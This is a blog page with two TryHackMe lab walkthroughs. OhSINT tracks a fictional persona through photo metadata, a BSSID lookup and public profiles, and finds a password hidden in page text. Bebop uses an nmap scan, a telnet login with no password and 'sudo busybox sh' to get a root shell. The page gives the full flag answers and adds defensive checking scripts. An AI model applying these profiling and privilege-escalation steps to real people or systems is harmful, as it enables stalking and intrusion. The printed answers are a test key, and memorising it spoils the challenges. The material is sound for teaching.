Month: March 2025

Capture the Flag

TryHackMe Room Walkthrough: OhSINT

[Image: what the starting image looks like for the room]

Today’s room is called OhSINT. It is another Free Room on TryHackMe, which means that anyone can follow along with me as long as you sign up for a free account. The point of this room is to show you some of the very basics of OSINT (Open-Source Intelligence), which is the process of gathering and analyzing publicly available information to gain insights and intelligence on a subject or target.

Note: This room was updated 2/1/2024, so this walkthrough will probably be different from others if you’re Googling around and found someone who did it closer to release date. This is noted in the room itself.

In this one, we only have an image to go off of. Let’s start with the basics and read the metadata on the image.

$ exiftool WindowsXP_1551719014755.jpg
ExifTool Version Number         : 13.00
File Name                       : WindowsXP_1551719014755.jpg
Directory                       : .
File Size                       : 234 kB
File Modification Date/Time     : 2025:03:08 15:53:27-05:00
File Access Date/Time           : 2025:03:08 15:54:52-05:00
File Inode Change Date/Time     : 2025:03:08 15:54:52-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
XMP Toolkit                     : Image::ExifTool 11.27
GPS Latitude                    : 54 deg 17' 41.27" N
GPS Longitude                   : 2 deg 15' 1.33" W
Copyright                       : OWoodflint
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1
GPS Latitude Ref                : North
GPS Longitude Ref               : West
GPS Position                    : 54 deg 17' 41.27" N, 2 deg 15' 1.33" W
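The two GPS tags above are the whole reason the room exists: a photo that was never scrubbed pins its author to a spot on a map. As an added example (not part of the original walkthrough), the script below parses exiftool’s `Tag : value` text output and converts the degrees/minutes/seconds coordinates into decimal degrees, which is the form map sites and the WiGLE search accept. The sample input is the three relevant lines from the output above, embedded as a constructed string.

```python
import re

# Constructed sample: the Copyright and GPS lines from the exiftool output above.
SAMPLE_EXIF = """\
Copyright                       : OWoodflint
GPS Latitude                    : 54 deg 17' 41.27" N
GPS Longitude                   : 2 deg 15' 1.33" W
"""

# Matches exiftool's human-readable DMS form, e.g. 54 deg 17' 41.27" N
DMS_RE = re.compile(r"""(\d+)\s*deg\s*(\d+)'\s*([\d.]+)"\s*([NSEW])""")


def parse_exiftool(text):
    """Turn exiftool's 'Tag : value' lines into a dict keyed by tag name."""
    tags = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        # partition on the first colon only: timestamps contain more colons
        key, _, value = line.partition(":")
        tags[key.strip()] = value.strip()
    return tags


def dms_to_decimal(dms):
    """Convert '54 deg 17' 41.27" N' to signed decimal degrees (S and W negative)."""
    m = DMS_RE.search(dms)
    if not m:
        raise ValueError(f"not a DMS coordinate: {dms!r}")
    deg, minutes, seconds, hemisphere = m.groups()
    value = int(deg) + int(minutes) / 60 + float(seconds) / 3600
    if hemisphere in "SW":
        value = -value
    return round(value, 6)


def location_from_exif(text):
    """Pull the author tag and a decimal lat/lon pair out of exiftool output."""
    tags = parse_exiftool(text)
    return {
        "copyright": tags.get("Copyright"),
        "lat": dms_to_decimal(tags["GPS Latitude"]),
        "lon": dms_to_decimal(tags["GPS Longitude"]),
    }


if __name__ == "__main__":
    print(location_from_exif(SAMPLE_EXIF))
```

The defender-side check is the mirror image: run the same parser over images before they are published and refuse any file that still carries `GPS Latitude`, `GPS Longitude` or an identifying `Copyright` tag. Stripping everything with `exiftool -all= image.jpg` before upload removes the lead this whole room is built on.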

Question 1

Searching for the user that has the copyright, “OWoodflint”, I found this Twitter/X profile here.

What is this user’s avatar of?
Answer: Cat

Question 2

In this person’s tweets, they have one that says:

From my house I can get free wifi ;D

Bssid: B4:5D:50:AA:86:41 - Go nuts!

BSSID is “Basic Service Set Identifier” and is a unique ID to identify a wifi access point.

If I search for “bssid lookup”, the first result is WiGLE: Wireless Network Mapping at https://wigle.net. Okay, let’s check that out. I put the BSSID in the search on the right of the page and hit Filter, and my map didn’t change (except that all of the dots that had been on there were now gone). My guess was that maybe this left *ONLY* that network on the map, so I zoomed all the way out and saw a single dot in Europe. I zoomed in and it is in London. This could be me not knowing how to use the site, but it worked.

What city is this person in?
Answer: London

Question 3

Same site, just get the info of that point.

What is the SSID of the WAP he connected to?
Answer: UnileverWiFi

Question 4

Back to googling the username. The first result for me was https://github.com/OWoodfl1nt/. I know people sometimes associate their emails with their GitHub accounts, so I went in there. In the readme of his people_finder project, it says “Project starting soon! Email me if you want to help out: OWoodflint@gmail.com”.

What is his personal email address?
Answer: OWoodflint@gmail.com

Question 5

What site did you find his email address on?
Answer: GitHub

Question 6

I didn’t see anything about a holiday/vacation on X/Twitter or GitHub, so back to the Google search. It also returns his blog at https://oliverwoodflint.wordpress.com/. His first – and apparently only – post has the answer.

Where has he gone on holiday?
Answer: New York

Question 7

I actually found this one in multiple places on the internet because of this challenge, but not the intended places. So I’m going to work this as intended. From Google, I basically just have these three sites: X/Twitter, GitHub, and his blog. Since this is an OSINT challenge, I don’t expect they want us to try to crack his WordPress site. So, in true CTF-style thinking, I went looking for clues in his blog’s HTML source. I scrolled down and found this:

<p style="color:#ffffff;" class="has-text-color">pennYDr0pper.!</p>

Given the HTML, that means the text is actually on his page and rendered, but it is invisible because the text is the same color as the background. And sure enough:

[Image: the password is actually on the blog post screen all along, hidden white-on-white]

What is the person’s password?
Answer: pennYDr0pper.!
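White-on-white text is a classic way secrets leak from published pages, and it is easy to audit for. As an added example (not part of the original walkthrough), the script below walks an HTML document with the standard-library parser and reports any text whose inline `color` matches the page background. The sample document is constructed for this example: it contains the exact `<p>` quoted from the blog source above plus a visible paragraph and a short-form `#FFF` variant for contrast; the background colour is assumed to be `#ffffff`.

```python
import re
from html.parser import HTMLParser

# Constructed sample body. The second <p> is the element quoted from the blog source above.
SAMPLE_HTML = """
<body style="background-color:#ffffff">
<p>Welcome to my travel blog.</p>
<p style="color:#ffffff;" class="has-text-color">pennYDr0pper.!</p>
<p style="color:#FFF">also hidden</p>
<p style="color:#000000">visible</p>
</body>
"""

# Match a 'color:' property but not 'background-color:' (lookbehind excludes a leading '-').
COLOR_RE = re.compile(r"(?<![-\w])color\s*:\s*(#[0-9a-fA-F]{3,6})")

# Void elements never get a closing tag, so they must not be pushed on the stack.
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "source"}


def normalize_hex(color):
    """Expand #FFF to #ffffff so short and long forms compare equal."""
    c = color.lstrip("#").lower()
    if len(c) == 3:
        c = "".join(ch * 2 for ch in c)
    return "#" + c


class HiddenTextFinder(HTMLParser):
    def __init__(self, background):
        super().__init__()
        self.background = normalize_hex(background)
        self.stack = []    # one bool per open element: True if its colour equals the background
        self.hidden = []   # text nodes found inside a colour-matched element

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        m = COLOR_RE.search(style)
        self.stack.append(bool(m) and normalize_hex(m.group(1)) == self.background)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        text = data.strip()
        # any() so text nested inside a hidden ancestor is caught too
        if text and any(self.stack):
            self.hidden.append(text)


def find_hidden_text(html, background="#ffffff"):
    """Return the text fragments rendered in the same colour as the page background."""
    finder = HiddenTextFinder(background)
    finder.feed(html)
    return finder.hidden


if __name__ == "__main__":
    print(find_hidden_text(SAMPLE_HTML))
```

This only covers inline `style` colours, which is what the blog in this room uses; text hidden through a stylesheet class, `display:none`, or `font-size:0` would need the computed style from a real browser. Running a check like this over a site before it goes live is the cheap way to make sure “invisible” never means “secret”.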

That’s it. Just a fun little very introductory primer on using search engines and social profiles to do some very basic OSINT and show you the beginning of what’s possible. Any questions, let me know.

Capture the Flag

TryHackMe Room Walkthrough: Bebop

[Image: an evil drone, representing the drone in this exercise]

Today, we’re going to work our way through another TryHackMe room called Bebop. This one isn’t in the Free Tier, but it is rated “Easy” and is a “Walkthrough Room” rather than a “Challenge Room”. Because of that, there will be some additional questions beyond just posting the User and Root flags. Getting started, the room description says, “Who thought making a flying shell was a good idea?”. For the first task, it reads, “For this mission, you have been assigned the codename ‘pilot’. Press the Start Machine button to make the drone takeoff!”.

Task 1

“Deploy the machine.”
Answer: No answer needed
“What is your codename?”
Answer: pilot

Task 2

With the machine started and enough time elapsed, I first ran an nmap scan to see what we were dealing with.

~# nmap -sCV -T4 10.10.194.21
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-05 16:25 GMT
Nmap scan report for 10.10.194.21
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
MAC Address: 02:D4:65:95:48:91 (Unknown)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.44 seconds

So, ports 22 (SSH) and 23 (telnet) are open. SSH is rarely the initial way in when you have no credentials, so let’s try telnet, remembering the username of pilot that they already told us and then asked us about. Connecting, I was prompted for a login and typed pilot. That immediately dropped me into an interactive session with no password asked. So, they meant Easy easy on this one.

root@ip-10-10-235-128:~# telnet 10.10.194.21
Trying 10.10.194.21...
Connected to 10.10.194.21.
Escape character is '^]'.
login: pilot
Last login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
Want to strip UTF-8 BOM(Byte Order Mark) from given files?

	sed -e '1s/^\xef\xbb\xbf//' < bomfile > newfile
[pilot@freebsd ~]$ 

Okay, so we’re already at a command prompt. No issues here.

Doing an ls shows the user.txt file in our home directory, and cat-ing it out gives us the first answer of Task 2.

[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt
THM{r3m0v3_b3f0r3_fl16h7}

What is the User Flag?
Answer: THM{r3m0v3_b3f0r3_fl16h7}

Moving on, we need to see what we can do to elevate our privileges to root to get the root flag. One of the first things I usually do is sudo -l to see what we can run with sudo. Since we didn’t use a password to log in, we wouldn’t know the account’s password if it had one. Luckily, sudo didn’t ask for one to run this command.

[pilot@freebsd ~]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox

Okay, so we can run the busybox binary with sudo as root with no password. Is that useful? This is where I check my favorite PrivEsc companion, GTFOBins, to see. You can find the entry for busybox there. Taking a small aside, busybox is a utility you often find in embedded systems; it contains its own implementations of things like ls, sh, mv, etc. in a single binary. On these systems you can run the commands by calling busybox {command}, or – quite often – the person who set up the system will symlink the command name to busybox so that, for example, ls really runs busybox ls: ln -s /bin/busybox /bin/ls. So you might not even know that busybox is involved. This lets the system ship one binary instead of many, with an overall size savings.
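The finding here is really a sudoers misconfiguration, and it is the kind of thing worth checking for systematically rather than by eye. As an added example (not part of the original walkthrough), the script below parses `sudo -l` output and flags any rule that lets a user run, as root, a binary that can spawn a shell, busybox included. The first sample is the exact `sudo -l` output from this room; the second is a constructed, benign rule for contrast. The set of shell-escape binaries is a small constructed subset for illustration; GTFOBins is the authoritative reference.

```python
import re

# The sudo -l output from the room, used as sample input.
SAMPLE_SUDO_L = """\
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
"""

# Constructed benign rule: a specific service restart, not a shell-capable binary.
SAMPLE_SAFE = """\
User deploy may run the following commands on web1:
    (root) NOPASSWD: /usr/sbin/service nginx reload
"""

# Binaries that can hand out a shell when run as root. Constructed subset; see GTFOBins.
SHELL_ESCAPE_BINS = {
    "busybox", "sh", "bash", "csh", "vim", "vi", "less", "more",
    "find", "awk", "python", "perl", "env", "tar", "zip",
}

# (runas) [TAG: ...] command[, command...]   e.g.  (root) NOPASSWD: /usr/local/bin/busybox
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Turn sudo -l output into a list of {runas, nopasswd, command} dicts."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as 'User pilot may run ...'
        runas, tags, commands = m.groups()
        for cmd in commands.split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({
                    "runas": runas.strip(),
                    "nopasswd": "NOPASSWD" in tags,
                    "command": cmd,
                })
    return rules


def risky_rules(text):
    """Rules that run a shell-capable binary (or ALL) as root."""
    flagged = []
    for rule in parse_sudo_l(text):
        runas_user = rule["runas"].split(":")[0].strip()   # '(root : root)' -> 'root'
        binary = rule["command"].split()[0].rsplit("/", 1)[-1]
        as_root = runas_user in ("root", "ALL")
        if as_root and (rule["command"] == "ALL" or binary in SHELL_ESCAPE_BINS):
            flagged.append(rule)
    return flagged


if __name__ == "__main__":
    for rule in risky_rules(SAMPLE_SUDO_L):
        print("RISK:", rule)
    print("benign sample flagged:", risky_rules(SAMPLE_SAFE))
```

Note that restricting the rule to `busybox ls` would not help, because busybox carries its own `sh`; the fix is to drop the rule entirely or grant a purpose-built wrapper script instead of a multi-call binary.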

In this case, that means if I call sudo busybox sh, I’ll get a shell opened as root, which is just what happened.

[pilot@freebsd ~]$ sudo busybox sh
# whoami
root

From there, we navigate to the root directory and cat out the file.

# cd /root
# ls
.bash_history	.history	.login		root.txt
.cshrc		.k5login	.profile
# cat root.txt
THM{h16hw4y_70_7h3_d4n63r_z0n3}

What is the Root Flag?
Answer: THM{h16hw4y_70_7h3_d4n63r_z0n3}

Task 3

What is the low privileged user?
Answer: pilot
What binary was used to escalate privileges?
Answer: busybox
What service was used to gain an initial shell?
Answer: telnet

Last question: we already knew this from the nmap scan and from the banner dumped at our login prompt, but you can always confirm it from within the system itself.

# uname -a
FreeBSD freebsd 11.2-STABLE FreeBSD 11.2-STABLE #0 r345837: Thu Apr  4 02:07:22 UTC 2019     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64

What Operating System does the drone run?
Answer: FreeBSD

That’s it. The most basic of rooms, but a pretty good entry point into some basic recon and basic PrivEsc if you’re new to this.